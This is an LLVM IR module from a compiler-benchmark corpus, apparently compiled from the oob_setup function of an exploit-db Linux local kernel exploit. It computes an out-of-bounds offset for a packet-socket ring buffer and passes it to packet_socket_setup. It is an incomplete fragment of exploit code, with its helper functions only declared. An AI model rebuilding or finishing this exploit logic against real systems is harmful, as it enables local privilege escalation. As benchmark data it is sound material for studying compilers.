; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_41994.c_oob_setup.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_41994.c_oob_setup.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@ETH_HDR_LEN = common dso_local global i32 0, align 4
@TPACKET3_HDRLEN = common dso_local global i64 0, align 8
@BLK_HDR_LEN = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @oob_setup(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  store i32 %0, i32* %2, align 4
  %7 = load i32, i32* @ETH_HDR_LEN, align 4
  store i32 %7, i32* %3, align 4
  %8 = load i64, i64* @TPACKET3_HDRLEN, align 8
  %9 = load i32, i32* %3, align 4
  %10 = icmp ult i32 %9, 16
  br i1 %10, label %11, label %12

11:                                               ; preds = %1
  br label %14

12:                                               ; preds = %1
  %13 = load i32, i32* %3, align 4
  br label %14

14:                                               ; preds = %12, %11
  %15 = phi i32 [ 16, %11 ], [ %13, %12 ]
  %16 = zext i32 %15 to i64
  %17 = add nsw i64 %8, %16
  %18 = call i32 @TPACKET_ALIGN(i64 %17)
  store i32 %18, i32* %4, align 4
  %19 = load i32, i32* %4, align 4
  %20 = load i32, i32* %3, align 4
  %21 = sub i32 %19, %20
  store i32 %21, i32* %5, align 4
  %22 = load i32, i32* @BLK_HDR_LEN, align 4
  %23 = sub i32 -1073709056, %22
  %24 = load i32, i32* %5, align 4
  %25 = sub i32 %23, %24
  %26 = load i32, i32* %2, align 4
  %27 = add i32 %25, %26
  store i32 %27, i32* %6, align 4
  %28 = load i32, i32* %6, align 4
  %29 = call i32 @packet_socket_setup(i32 32768, i32 2048, i32 2, i32 %28, i32 100)
  ret i32 %29
}

declare dso_local i32 @TPACKET_ALIGN(i64) #1

declare dso_local i32 @packet_socket_setup(i32, i32, i32, i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
